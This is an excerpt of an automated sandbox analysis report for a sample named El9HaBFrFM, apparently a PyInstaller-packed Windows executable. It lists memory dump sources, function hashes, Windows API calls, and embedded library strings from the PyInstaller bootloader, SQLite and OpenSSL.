                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-3538577999
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e3d2ce0c4fff4e1c0c7c24919622168c3af02abdc035857637c61f0fbd5ac263
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E751AE22F0B68389FB55AB15D820AB96B91EF82B94F484131DE7D473FDDE2DE445A300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD4D
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD5B
                                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADD85
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDF3
                                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6BA3ADF7A,?,?,?,00007FF6BA3ADC6C,?,?,?,00007FF6BA3AD869), ref: 00007FF6BA3ADDFF
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a3d4ed180d81392a6cf4a3dafeded7478e206175eca9272761dd2187bd56e02
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF31A421B1A76291EE129B1AE8006B973A5FF48BE4F594575DF5ECB384EF3CE4448300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6BA3A351A,?,00000000,00007FF6BA3A3F23), ref: 00007FF6BA3A2AA0
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                        • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                                                        • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                                                                        • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a8182a23c13780e6401c92c9fd7fc8c48b500facf54e986c4a195ee16457a5a2
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37217F32A19B9192E7209B59F8817EA6394BB88784F404176EF8DC3659EF7CD1858740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a1a13a9c21bb540d1afd7dfa216c21187366486237ffc4c511fbdf12f5af6df1
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F212C31A0CB5242EA509B59F94422EA7A5FF857A0F504275EF6DC3BE8EF7CD4458B00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5dd915d36b36404ce86f70dc1682120da8bfa279304a69ed4c3c173e70c50d0f
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 955e69dbdd4f648e313349aefb080b734bae4ce698d47d394c7c697acdce6f2d
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1213B20F0CA5682FA68AB6D9A5113962535F447F0F9447B4DF7EC7AE6DE2DF8418300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                                                        • Instruction ID: f22df984048e9a670526796e3420dbc5eed755ff80c208596407c63db79874fd
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B118E21A18B5186E7508B2AFC55329A6A0FB88BE4F104274EF9DC77A4EF3CD854C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-1635961163
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 328c265f7e45922d66e428d189de535ccae6df59de94a9472eb2a2702a0404c6
                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd1dbb82ba61f8ff300e80d574cd2c6cb95eea603b548365313fe6cf7973f7e9
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 328c265f7e45922d66e428d189de535ccae6df59de94a9472eb2a2702a0404c6
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3502BE32B08A8281E7698F55E460BAD77A0FB84B84F948176DEAC477D9CF3CE585C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-1299490920
                                                                                                                                                                                                                                                                                                                        • Opcode ID: fabbb4d1d20f4139f00e6ea10005f669c0fc0d99471c8184c1bd31ed3a32835f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: e8327a2d5d205732dc3e298bbbec725d7fb75ea55f9ddc3d8a2b32d43d087eb4
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fabbb4d1d20f4139f00e6ea10005f669c0fc0d99471c8184c1bd31ed3a32835f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4202AC63B0AB8682EB518B11D560BBA77A1FB45B88F444232EE6D477E8DF3CE541C300
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8EFD
                                                                                                                                                                                                                                                                                                                        • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8F5A
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6BA3A45F4,00000000,00007FF6BA3A1985), ref: 00007FF6BA3A93C9
                                                                                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A8FE5
                                                                                                                                                                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9044
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A9055
                                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6BA3A3FB1), ref: 00007FF6BA3A906A
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca174d3faf54e9f5f0cfa029f881c9ac89c01321f0ff62ee77fcfafd13dbbd69
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7141BC62B19A9281EE309B5AE4102BEB3A6FB85BC4F444175DF8DE7789DE3CE500C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-3727861699
                                                                                                                                                                                                                                                                                                                        • Opcode ID: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3be5fdbbb90781cf63489c953f212562c33a0e77be59c8a5217f0da86b42cd74
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3F18C7370AB8296D7A48B55E050BAD77A0FB46BC4F108036EE9E43BA9DF39D844D700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetCurrentProcess.KERNEL32 ref: 00007FF6BA3A8590
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: OpenProcessToken.ADVAPI32 ref: 00007FF6BA3A85A3
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetTokenInformation.ADVAPI32 ref: 00007FF6BA3A85C8
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetLastError.KERNEL32 ref: 00007FF6BA3A85D2
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: GetTokenInformation.ADVAPI32 ref: 00007FF6BA3A8612
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6BA3A862E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3A8570: CloseHandle.KERNEL32 ref: 00007FF6BA3A8646
                                                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A916C
                                                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6BA3A3C55), ref: 00007FF6BA3A9175
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: bce30d106d1aea433b574043196e7eeaa4ab3af65bd301622a4049b2291cccd5
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C213231A08B5282FA549B68E8152EE63A6FF84780F4444B5EF4DD3B96DF3CD945C740
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB2D7
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB30D
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB33A
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB34B
                                                                                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6BA3B4F11,?,?,?,?,00007FF6BA3BA48A,?,?,?,?,00007FF6BA3B718F), ref: 00007FF6BA3BB35C
